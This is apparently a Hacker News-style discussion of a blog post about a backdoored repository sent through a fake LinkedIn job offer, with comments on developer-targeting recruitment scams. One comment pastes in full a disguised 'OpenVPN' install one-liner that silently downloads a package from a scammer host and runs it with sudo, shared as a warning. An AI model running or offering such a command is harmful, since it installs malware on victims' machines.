A backdoor in a LinkedIn job offer
lwhsiao
944 points
182 comments
June 15, 2026
Related Discussions
Found 5 related stories in 114.1ms across 10,715 title embeddings via pgvector HNSW
- LinkedIn is scanning browser extensions un-nf · 417 pts · April 30, 2026 · 54% similar
- LinkedIn locks your GDPR rights behind a paywall doener · 35 pts · May 05, 2026 · 53% similar
- LinkedIn Fanfiction marginalia_nu · 71 pts · May 14, 2026 · 51% similar
- I was asked to install malware during a fake interview ashishb · 43 pts · May 13, 2026 · 49% similar
- Security researcher says Microsoft built a Bitlocker backdoor, releases exploit nolok · 558 pts · May 17, 2026 · 49% similar
Discussion Highlights (20 comments)
theoeiffijr
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast. Remember to use protection when meeting random people, and putting their junk deep inside your computer!
CyanLite2
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
rektomatic
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
robotnikman
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity. Stay vigilant out there everyone.
jmward01
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
CalChris
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
clemailacct1
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
contingencies
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
dyingkneepad
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
wxw
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.” > ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine. > npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor. > The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install. Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
mattcasmith
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on. The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
atum47
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
yieldcrv
now imagine if you were like the rest of us and didn’t write a blog post about it
avgDev
More reasons for me to dislike linked-in. I have an account. I hate it.
l0new0lf-G
Yet another reason to be reluctant to even discuss linkedin job offers
Yhippa
> but on a more tired or rushed day This has nearly gotten me before, and I got lucky.
Raed667
They seem to using the same domain for multiple targets: reddit thread from 3 months ago: https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
BobAliceInATree
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up. Oh, Microsoft.
dolebirchwood
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already). They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed): ``` ( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url=" https://asshole.scammer.dev/openvpn-mac "; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ] ``` Yeah, no. Be careful out there. By the way, here's the scammer's "company website": https://jtwllc.com/ Superficially looks legit until you start investigating the finer details.
srikanth86
Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.